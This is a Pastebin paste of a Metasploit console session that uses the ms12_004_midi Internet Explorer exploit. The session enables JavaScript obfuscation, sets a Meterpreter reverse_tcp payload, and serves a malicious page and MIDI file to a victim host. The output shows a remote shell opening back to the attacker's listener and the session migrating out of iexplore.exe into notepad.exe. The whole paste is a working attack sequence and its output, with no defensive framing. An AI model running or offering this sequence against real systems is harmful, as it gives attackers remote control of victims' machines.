Advertisement
Guest User

Untitled

a guest
Jan 27th, 2012
1,226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.32 KB | None | 0 0
  1. msf > use windows/browser/ms12_004_midi
  2. msf exploit(ms12_004_midi) > set obfuscate true
  3. obfuscate => true
  4. msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp
  5. payload => windows/meterpreter/reverse_tcp
  6. msf exploit(ms12_004_midi) > set lhost 10.0.1.3
  7. lhost => 10.0.1.3
  8. msf exploit(ms12_004_midi) > show options
  9.  
  10. Module options (exploit/windows/browser/ms12_004_midi):
  11.  
  12. Name Current Setting Required Description
  13. ---- --------------- -------- -----------
  14. OBFUSCATE true no Enable JavaScript obfuscation
  15. SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
  16. SRVPORT 8080 yes The local port to listen on.
  17. SSL false no Negotiate SSL for incoming connections
  18. SSLCert no Path to a custom SSL certificate (default is randomly generated)
  19. SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  20. URIPATH no The URI to use for this exploit (default is random)
  21.  
  22.  
  23. Payload options (windows/meterpreter/reverse_tcp):
  24.  
  25. Name Current Setting Required Description
  26. ---- --------------- -------- -----------
  27. EXITFUNC process yes Exit technique: seh, thread, process, none
  28. LHOST 10.0.1.3 yes The listen address
  29. LPORT 4444 yes The listen port
  30.  
  31.  
  32. Exploit target:
  33.  
  34. Id Name
  35. -- ----
  36. 0 Automatic
  37.  
  38.  
  39. msf exploit(ms12_004_midi) > exploit
  40. [*] Exploit running as background job.
  41.  
  42. [*] Started reverse handler on 10.0.1.3:4444
  43. [*] Using URL: http://0.0.0.0:8080/ZTee20TR5fR
  44. msf exploit(ms12_004_midi) > [*] Local IP: http://10.0.1.3:8080/ZTee20TR5fR
  45. [*] Server started.
  46. [*] Sending html to 10.0.1.4:2319...
  47. [*] Sending midi file to 10.0.1.4:2320...
  48. [*] Sending stage (752128 bytes) to 10.0.1.4
  49. [*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.4:2325) at 2012-01-27 03:41:53 -0600
  50. [*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.4:2325) processing InitialAutoRunScript 'migrate -f'
  51. [*] Current server process: iexplore.exe (3456)
  52. [*] Spawning notepad.exe process to migrate to
  53. [+] Migrating to 2744
  54. [+] Successfully migrated to process
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement